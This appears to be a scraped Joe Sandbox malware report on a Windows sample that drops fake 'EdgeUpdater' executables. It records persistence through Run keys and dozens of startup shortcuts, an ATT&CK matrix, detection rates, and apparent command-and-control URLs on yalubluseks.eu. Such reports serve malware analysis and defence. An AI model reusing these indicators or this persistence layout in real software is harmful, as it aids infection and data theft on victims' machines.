Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation121
Registry Run Keys / Startup Folder
11
Process Injection
1
Masquerading
OS Credential Dumping1
Query Registry
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
121
Registry Run Keys / Startup Folder
1
Disable or Modify Tools
LSASS Memory111
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
41
Virtualization/Sandbox Evasion
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS41
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain Credentials1
System Network Configuration Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSync2
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc Filesystem12
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524651 Sample: file.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 88 44 yalubluseks.eu 2->44 46 api.ipify.org 2->46 48 57.122.6.0.in-addr.arpa 2->48 56 Multi AV Scanner detection for domain / URL 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 Sigma detected: New RUN Key Pointing to Suspicious Folder 2->60 62 3 other signatures 2->62 8 file.exe 1 6 2->8         started        12 LKMService.exe 2->12         started        14 GoogleUpdater.exe 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 38 C:\Users\user\AppData\...\LKMService.exe, PE32 8->38 dropped 40 C:\Users\...\LKMService.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\file.exe.log, CSV 8->42 dropped 70 Creates multiple autostart registry keys 8->70 18 LKMService.exe 16 217 8->18         started        23 WerFault.exe 3 21 12->23         started        25 WerFault.exe 14->25         started        27 WerFault.exe 16->27         started        29 WerFault.exe 16->29         started        signatures6 process7 dnsIp8 50 yalubluseks.eu 104.21.54.163, 443, 49716, 49717 CLOUDFLARENETUS United States 18->50 52 104.26.12.205, 52918, 52923, 52925 CLOUDFLARENETUS United States 18->52 54 api.ipify.org 172.67.74.152, 49715, 80 CLOUDFLARENETUS United States 18->54 34 C:\Users\user\AppData\...behaviorgraphoogleUpdater.exe, PE32 18->34 dropped 36 C:\...behaviorgraphoogleUpdater.exe:Zone.Identifier, ASCII 18->36 dropped 64 Multi AV Scanner detection for dropped file 18->64 66 Machine Learning detection for dropped file 18->66 68 Creates multiple autostart registry keys 18->68 31 GoogleUpdater.exe 18->31         started        file9 signatures10 process11 signatures12 72 Multi AV Scanner detection for dropped file 31->72 74 Machine Learning detection for dropped file 31->74

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.exe18%ReversingLabs
file.exe24%VirustotalBrowse
file.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe18%ReversingLabs
C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe24%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe18%ReversingLabs
C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe24%VirustotalBrowse
No Antivirus matches
SourceDetectionScannerLabelLink
api.ipify.org0%VirustotalBrowse
yalubluseks.eu2%VirustotalBrowse
57.122.6.0.in-addr.arpa0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://sectigo.com/CPS00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%VirustotalBrowse
https://yalubluseks.eu/t0%VirustotalBrowse
http://api.ipify.org/0%VirustotalBrowse
https://yalubluseks.eu3%VirustotalBrowse
https://yalubluseks.eu/get_update.php1%VirustotalBrowse
https://yalubluseks.eu/get_update.phpT3%VirustotalBrowse
https://yalubluseks.eu/3%VirustotalBrowse
https://yalubluseks.eu/receive.php0%VirustotalBrowse
http://yalubluseks.eu2%VirustotalBrowse
http://api.ipify.org0%VirustotalBrowse
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%VirustotalBrowse
https://yalubluseks.eu/get_updatX7%VirustotalBrowse
https://yalubluseks.eu/get_file.php0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
172.67.74.152
truefalseunknown
yalubluseks.eu
104.21.54.163
truefalseunknown
57.122.6.0.in-addr.arpa
unknown
unknownfalseunknown
NameMaliciousAntivirus DetectionReputation
http://api.ipify.org/falseunknown
https://yalubluseks.eu/get_update.phpfalseunknown
https://yalubluseks.eu/receive.phpfalseunknown
https://yalubluseks.eu/get_file.phpfalseunknown
NameSourceMaliciousAntivirus DetectionReputation
https://yalubluseks.eu/tLKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://yalubluseks.eudLKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpfalse
    unknown
    http://api.ipify.orgDLKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpfalse
      unknown
      http://api.ipify.orgdLKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpfalse
        unknown
        https://sectigo.com/CPS0file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drfalse
        • URL Reputation: safe
        unknown
        https://yalubluseks.euDLKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpfalse
          unknown
          http://ocsp.sectigo.com0file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drfalse
          • URL Reputation: safe
          unknown
          https://yalubluseks.eu/get_filTLKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            https://yalubluseks.eu/receiPtLKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              https://yalubluseks.eu/get_update.phpTLKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sfile.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drfalseunknown
              https://pidgin.im0file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drfalse
                unknown
                https://yalubluseks.euLKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://yalubluseks.eu/get_updatXLKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drfalseunknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://yalubluseks.eu/file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drfalseunknown
                http://yalubluseks.euLKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://api.ipify.orgfile.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drfalseunknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                104.26.12.205
                unknownUnited States
                13335CLOUDFLARENETUSfalse
                104.21.54.163
                yalubluseks.euUnited States
                13335CLOUDFLARENETUSfalse
                172.67.74.152
                api.ipify.orgUnited States
                13335CLOUDFLARENETUSfalse
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1524651
                Start date and time:2024-10-03 03:25:11 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 43s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:21
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Sample name:file.exe
                Detection:MAL
                Classification:mal88.winEXE@13/88@6/3
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 156
                • Number of non-executed functions: 22
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 104.208.16.94, 52.168.117.172, 20.189.173.20, 20.42.73.29
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus07.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                TimeTypeDescription
                03:26:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LKMService_047c5762224547e8b0906f5148be419e C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                03:26:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LKMService_773ee3bb9e0f4071afc0e6a7986206d0 C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                03:26:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LKMService_047c5762224547e8b0906f5148be419e C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                03:26:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LKMService_773ee3bb9e0f4071afc0e6a7986206d0 C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                03:26:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_acbb346df900467ebd8c2c0ce13844f9.lnk
                03:27:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f5a844d131a542409d15c7be5595addc.lnk
                03:27:19AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_284cd24aa4e1493cb8422375a300e535.lnk
                03:27:32AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0792a7c0e50544d6a4b11823b693efec.lnk
                03:27:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a278fa9619bf4a8490c564cef196d074.lnk
                03:27:58AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c36777343f8646bc9f8bb6efc22ef9b8.lnk
                03:28:11AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c42d1852306b4504949cf6ca50578a33.lnk
                03:28:24AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1256348d10fc4ee0a7d0b9467a5418cd.lnk
                03:28:37AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9b86ceab65de49c49beb8cb12c410381.lnk
                03:28:50AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dfb16a4487ec4beaa1b1d78b04a99008.lnk
                03:29:04AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3f0be1f466f84181ba333a6df3a516b0.lnk
                03:29:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_14b6d09a20e948a5a8f9a9a0b7ab87d8.lnk
                03:29:30AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e4514974b9824faaadddc6ac58593bda.lnk
                03:29:43AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3be1c6c02fcd4cbca121074b848dedc4.lnk
                03:29:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6a116b04f0f242828231c1125d228a02.lnk
                03:30:09AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4692d6301ce44aab83e87c0b2b5f5198.lnk
                03:30:23AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_656a64c036b1429a867161afd7bdea67.lnk
                03:30:36AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_86d6609c76b64087bc00bfe8c940dcba.lnk
                03:30:49AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_814cf7f275454a049baf97daade52701.lnk
                21:26:10API Interceptor1x Sleep call for process: file.exe modified
                21:26:11API Interceptor6340307x Sleep call for process: LKMService.exe modified
                21:26:26API Interceptor4x Sleep call for process: WerFault.exe modified
                21:26:44API Interceptor6462833x Sleep call for process: GoogleUpdater.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                104.26.12.205file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                • api.ipify.org/
                Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                • api.ipify.org/
                2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousUnknownBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousUnknownBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousUnknownBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousLummaC, VidarBrowse
                • api.ipify.org/
                SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                • api.ipify.org/
                104.21.54.163firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                • 104.21.54.163/
                172.67.74.152file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousRDPWrap ToolBrowse
                • api.ipify.org/
                Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                • api.ipify.org/
                2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousUnknownBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                • api.ipify.org/
                file.exeGet hashmaliciousUnknownBrowse
                • api.ipify.org/
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                yalubluseks.eufile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                • 172.67.140.92
                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                • 104.21.54.163
                2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                • 172.67.140.92
                2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                • 172.67.140.92
                file.exeGet hashmaliciousUnknownBrowse
                • 172.67.140.92
                file.exeGet hashmaliciousUnknownBrowse
                • 104.21.54.163
                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                • 172.67.140.92
                file.exeGet hashmaliciousUnknownBrowse
                • 172.67.140.92
                file.exeGet hashmaliciousUnknownBrowse
                • 172.67.140.92
                file.exeGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                api.ipify.orgPO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 172.67.74.152
                AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 104.26.13.205
                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                • 104.26.12.205
                z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                • 104.26.12.205
                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                • 172.67.74.152
                file.exeGet hashmaliciousRDPWrap ToolBrowse
                • 172.67.74.152
                file.exeGet hashmaliciousRDPWrap ToolBrowse
                • 104.26.13.205
                DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
